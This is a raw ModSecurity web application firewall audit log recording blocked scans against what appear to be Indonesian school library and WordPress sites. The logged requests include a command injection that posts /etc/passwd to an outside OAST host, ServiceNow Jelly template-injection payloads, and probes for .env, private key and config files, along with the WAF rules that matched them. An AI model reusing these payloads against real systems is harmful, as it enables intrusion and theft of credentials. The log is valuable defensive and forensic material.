--0d4c297d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749165591611095 854 (- - -) Stopwatch2: 1749165591611095 854; combined=371, p1=338, p2=0, p3=0, p4=0, p5=33, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d4c297d-Z-- --571b2e2d-A-- [06/Jun/2025:06:40:23 +0700] aEIq5-JsrKcXA4Tjex0GrwAAAFQ 103.236.140.4 48662 103.236.140.4 8181 --571b2e2d-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 192 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:135.0) Gecko/20100101 Firefox/135.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172956281 --571b2e2d-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0us2vpgpeonc6qdbef0m5w67p5bw1wcj.oast.me) --571b2e2d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --571b2e2d-E-- --571b2e2d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749166823415070 2554 (- - -) Stopwatch2: 1749166823415070 2554; combined=647, p1=424, p2=198, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --571b2e2d-Z-- --17ee3c42-A-- [06/Jun/2025:06:40:24 +0700] aEIq6OJsrKcXA4Tjex0GsgAAAFg 103.236.140.4 48682 103.236.140.4 8181 --17ee3c42-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172707634 --17ee3c42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --17ee3c42-E-- --17ee3c42-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749166824070080 2221 (- - -) Stopwatch2: 1749166824070080 2221; combined=910, p1=349, p2=532, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17ee3c42-Z-- --0923dc11-A-- [06/Jun/2025:07:13:58 +0700] aEIyxtKrQJH3faNNWWAXSgAAAMw 103.236.140.4 48788 103.236.140.4 8181 --0923dc11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.102.236.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.102.236.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0923dc11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0923dc11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749168838336462 3208 (- - -) Stopwatch2: 1749168838336462 3208; combined=1380, p1=463, p2=885, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0923dc11-Z-- --a45b5068-A-- [06/Jun/2025:07:53:32 +0700] aEI8DNKrQJH3faNNWWAXrAAAAMg 103.236.140.4 49716 103.236.140.4 8181 --a45b5068-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 143.137.64.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.137.64.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a45b5068-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a45b5068-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749171212762657 3462 (- - -) Stopwatch2: 1749171212762657 3462; combined=1463, p1=486, p2=946, p3=0, p4=0, p5=31, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a45b5068-Z-- --5347b67e-A-- [06/Jun/2025:07:57:31 +0700] aEI8-_HwHPygw9BuFzQ2JAAAAJY 103.236.140.4 49972 103.236.140.4 8181 --5347b67e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.39.241.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.39.241.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5347b67e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5347b67e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749171451634538 3236 (- - -) Stopwatch2: 1749171451634538 3236; combined=1329, p1=470, p2=830, p3=0, p4=0, p5=29, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5347b67e-Z-- --2bfbff5d-A-- [06/Jun/2025:08:18:07 +0700] aEJBz_HwHPygw9BuFzQ2MAAAAJE 103.236.140.4 50122 103.236.140.4 8181 --2bfbff5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.204.160.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.204.160.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2bfbff5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bfbff5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749172687750796 3132 (- - -) Stopwatch2: 1749172687750796 3132; combined=1311, p1=454, p2=828, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bfbff5d-Z-- --a9d3da51-A-- [06/Jun/2025:08:45:25 +0700] aEJINWaFzeU7VUj_TDF04gAAABA 103.236.140.4 50422 103.236.140.4 8181 --a9d3da51-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173732132 --a9d3da51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a9d3da51-E-- --a9d3da51-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174325224568 2561 (- - -) Stopwatch2: 1749174325224568 2561; combined=1340, p1=357, p2=947, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9d3da51-Z-- --507b1d3e-A-- [06/Jun/2025:08:48:04 +0700] aEJI1NKrQJH3faNNWWAYTgAAAMU 103.236.140.4 50530 103.236.140.4 8181 --507b1d3e-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 172707658 --507b1d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --507b1d3e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174484825333 718 (- - -) Stopwatch2: 1749174484825333 718; combined=256, p1=227, p2=0, p3=0, p4=0, p5=28, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --507b1d3e-Z-- --b872b251-A-- [06/Jun/2025:08:48:04 +0700] aEJI1NKrQJH3faNNWWAYTwAAANM 103.236.140.4 50534 103.236.140.4 8181 --b872b251-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173920999 --b872b251-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b872b251-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174484826950 665 (- - -) Stopwatch2: 1749174484826950 665; combined=257, p1=223, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b872b251-Z-- --215ebe1c-A-- [06/Jun/2025:08:48:04 +0700] aEJI1OJsrKcXA4Tjex0HQQAAAEg 103.236.140.4 50514 103.236.140.4 8181 --215ebe1c-B-- GET /etc/ssl/private/server.key HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173976139 --215ebe1c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --215ebe1c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174484860481 1856 (- - -) Stopwatch2: 1749174484860481 1856; combined=693, p1=348, p2=318, p3=0, p4=0, p5=26, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --215ebe1c-Z-- --26c60075-A-- [06/Jun/2025:08:48:04 +0700] aEJI1OJsrKcXA4Tjex0HQwAAAEo 103.236.140.4 50514 103.236.140.4 8181 --26c60075-B-- GET /.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173863884 --26c60075-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --26c60075-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174484862796 546 (- - -) Stopwatch2: 1749174484862796 546; combined=249, p1=222, p2=0, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26c60075-Z-- --13c80c05-A-- [06/Jun/2025:08:48:05 +0700] aEJI1YpHVOr-3zoVB37DuAAAAQ8 103.236.140.4 50538 103.236.140.4 8181 --13c80c05-B-- GET /_vti_pvt/service.pwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173534777 --13c80c05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13c80c05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".pwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174485040559 2024 (- - -) Stopwatch2: 1749174485040559 2024; combined=727, p1=357, p2=306, p3=0, p4=0, p5=64, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c80c05-Z-- --26317d09-A-- [06/Jun/2025:08:48:05 +0700] aEJI1dKrQJH3faNNWWAYUwAAAMw 103.236.140.4 50568 103.236.140.4 8181 --26317d09-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173863887 --26317d09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --26317d09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174485043547 677 (- - -) Stopwatch2: 1749174485043547 677; combined=291, p1=261, p2=0, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26317d09-Z-- --75afd45f-A-- [06/Jun/2025:08:48:05 +0700] aEJI1WaFzeU7VUj_TDF08AAAABU 103.236.140.4 50580 103.236.140.4 8181 --75afd45f-B-- GET /web.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173534780 --75afd45f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --75afd45f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174485043546 816 (- - -) Stopwatch2: 1749174485043546 816; combined=293, p1=260, p2=0, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75afd45f-Z-- --eae4a109-A-- [06/Jun/2025:08:48:05 +0700] aEJI1YpHVOr-3zoVB37DugAAARE 103.236.140.4 50538 103.236.140.4 8181 --eae4a109-B-- GET /server.key HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173921011 --eae4a109-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eae4a109-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174485043026 2023 (- - -) Stopwatch2: 1749174485043026 2023; combined=716, p1=410, p2=280, p3=0, p4=0, p5=26, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eae4a109-Z-- --27376535-A-- [06/Jun/2025:08:52:41 +0700] aEJJ6eJsrKcXA4Tjex0HRQAAAE8 103.236.140.4 50620 103.236.140.4 8181 --27376535-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.148.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.148.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --27376535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27376535-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174761829702 3417 (- - -) Stopwatch2: 1749174761829702 3417; combined=1458, p1=489, p2=937, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27376535-Z-- --7eb1935a-A-- [06/Jun/2025:08:57:55 +0700] aEJLI2aFzeU7VUj_TDF08gAAAAc 103.236.140.4 50632 103.236.140.4 8181 --7eb1935a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.213.133.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.213.133.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7eb1935a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 